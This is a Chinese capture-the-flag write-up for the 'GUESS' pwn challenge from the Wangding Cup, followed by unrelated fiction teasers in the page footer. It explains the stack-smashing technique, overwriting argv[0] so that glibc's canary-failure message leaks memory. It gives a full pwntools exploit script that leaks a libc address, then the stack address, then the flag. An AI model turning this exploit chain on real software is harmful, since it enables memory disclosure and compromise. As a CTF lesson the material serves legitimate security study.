网鼎杯 pwn guess wp记录 stack smashing

首先 查看保护

开启了 canary,NX   64位程序

ida查看程序

__int64 __fastcall main(__int64 a1, char **a2, char **a3)

{

  __WAIT_STATUS stat_loc; // [rsp+14h] [rbp-8Ch]

  int v5; // [rsp+1Ch] [rbp-84h]

  __int64 v6; // [rsp+20h] [rbp-80h]

  __int64 v7; // [rsp+28h] [rbp-78h]

  char buf; // [rsp+30h] [rbp-70h]

  char s2; // [rsp+60h] [rbp-40h]

  unsigned __int64 v10; // [rsp+98h] [rbp-8h]

  v10 = __readfsqword(0x28u);

  v7 = 3LL;

  LODWORD(stat_loc.__uptr) = 0;

  v6 = 0LL;

  sub_4009A6(a1, a2, a3);

  HIDWORD(stat_loc.__iptr) = open("./flag.txt", 0, a2);

  if ( HIDWORD(stat_loc.__iptr) == -1 )

  {

    perror("./flag.txt");

    _exit(-1);

  }

  read(SHIDWORD(stat_loc.__iptr), &buf, 0x30uLL);

  close(SHIDWORD(stat_loc.__iptr));

  puts("This is GUESS FLAG CHALLENGE!");

  while ( 1 )

  {

    if ( v6 >= v7 )

    {

      puts("you have no sense... bye :-) ");

      return 0LL;

    }

    v5 = sub_400A11();

    if ( !v5 )

      break;

    ++v6;

    wait((__WAIT_STATUS)&stat_loc);

  }

  puts("Please type your guessing flag");

  gets(&s2);

  if ( !strcmp(&buf, &s2) )

    puts("You must have great six sense!!!! :-o ");

  else

    puts("You should take more effort to get six sence, and one more challenge!!");

  return 0LL;

}

首先是将flag.txt读入到buf中


这里有一个get 可以进行溢出

我们知道开启canary后 如果溢出将canary覆盖掉的话就会进入__stack_chk_fai 这个函数

看一下这个函数的源码

void__attribute__ ((noreturn)) __stack_chk_fail (void)

{

__fortify_fail ("stack smashing detected");

}

void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)

{

  /* The loop is added only to keep gcc happy.  */

  while (1)

    __libc_message (2, "*** %s ***: %s terminated\n", msg, __libc_argv[0] ?: "<unknown>");

}

看到函数中会将 __libc_argv[0]输出  如果__libc_argv[0]指向的是存储flag.txt那个buf的位置呢?  就会把buf输出出来

这就是 stack smashing的原理   通过覆盖__libc_argv[0]的内容通过canary保护报错信息将我们覆盖的内容输出出来

这里就是触发了canary保护 输出了

*** stack smashing detected ***: ./GUESS terminated

首先思考第一个问题

如何覆盖argv[0]这个变量?

可以通过gdb调试先找到我们输入地方的地址 然后再找到argv的地址 这样就可以计算两者之间的偏移 

先找argv的地址,在上边那个图中可以看到 argv[0]  输出的是 “./GUESS”

这是指的程序文件,我们可以用gdb进行调试 断点下在main函数入口  指向文件位置那个就是argv[0]的地址


也可以直接通过 p 命令


然后就是 我们输入的地址 也就是s2的地址

可以将断点下在call get这个位置


可以看到s2是在rbp-0x40的位置


那么偏移就有了


下一个问题

我们如何让argv[0]指向存储flag的buf位置呢?

首先说一个environ

environ是libc中存储栈地址的一个变量  我们可以泄露libc地址然后算出environ的地址 然后算出flag和environ的偏移 就可以将flag通过触发cancry报错出来

存flag的地址和上边s2一样方法算出来


environ可以通过给在environ这下一个断点


就得到environ的地址了 那么 flag和environ的偏移就可以算了



from pwn import *

from LibcSearcher import *

sh = process('./GUESS')

#sh = remote('node3.buuoj.cn',29890)

elf = ELF('./GUESS')

puts_got = elf.got['puts']

print 'puts_got='+p64(puts_got)

def stackoverflow(payload):

  sh.sendlineafter('Please type your guessing flag',payload)

stackoverflow('a'*0x128 + p64(puts_got))

sh.recvuntil('stack smashing detected ***: ')

puts_addr = u64(sh.recv(6).ljust(8,'\x00'))

print 'puts_addr='+hex(puts_addr)

libc = LibcSearcher('puts',puts_addr)

libc_base = puts_addr - libc.dump('puts')

environ_addr = libc_base + libc.dump('__environ')

print 'environ_addr='+hex(environ_addr)

stackoverflow('a'*0x128 + p64(environ_addr))

sh.recvuntil('stack smashing detected ***: ')

stack_addr = u64(sh.recv(6).ljust(8,'\x00'))

print 'stack_addr'+hex(stack_addr)

flag_addr = stack_addr - 0x168

print 'flag_addr=',hex(flag_addr)

stackoverflow('a'*0x128 + p64(flag_addr))

sh.interactive()

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 218,122评论 6 505
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,070评论 3 395
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 164,491评论 0 354
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,636评论 1 293
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,676评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,541评论 1 305
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,292评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,211评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,655评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,846评论 3 336
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,965评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,684评论 5 347
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,295评论 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,894评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,012评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,126评论 3 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,914评论 2 355